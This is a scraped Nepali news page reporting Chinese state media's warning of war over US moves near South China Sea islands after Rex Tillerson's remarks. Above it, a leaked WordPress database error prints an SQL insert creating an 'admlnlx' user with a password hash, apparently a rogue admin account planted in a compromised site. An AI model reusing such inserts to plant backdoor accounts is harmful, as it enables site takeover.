WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BchnA1ZU/R0pQ.9ie9CdmBpSv5zbQO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:18:42', '', 'admlnlx', 'admlnlx')
एजेन्सी,माघ १-
चिनियाँ सञ्चारमाध्यमले अमेरिकाले दक्षिण चीन सागरमा बेइजिङले बनाएको कृतिम टापुसम्म जान रोकेमा भीषण युद्ध हुने चेतावनी दिएको छ । दुई दिनअघि मात्रै अमेरिकी विदेशमन्त्रीका रुपमा नाम चर्चामा रहेका रेक्स टेलरसनले अमेरिकाले चीनलाई दक्षिण चीन सागरका टापुसम्म पुग्न रोक्नुपर्ने अभिव्यक्ति दिएका थिए ।
चीनको सरकारी पत्रिका ग्लोबल टाइम्सले ‘के टिलरसनको धम्की मात्र सिनेटका लागि धोका हो ?’ शीर्षकमा लेखेको सम्पादकीयमा भनिएको छ, ‘सिनेट सदस्यको समर्थन जुटाउन र जानीबुझीकन चीनमाथिको कठोर नीति देखाएर नियुक्तिको सहमति पाउने सम्भावनालाई बढाउनु थियो ।’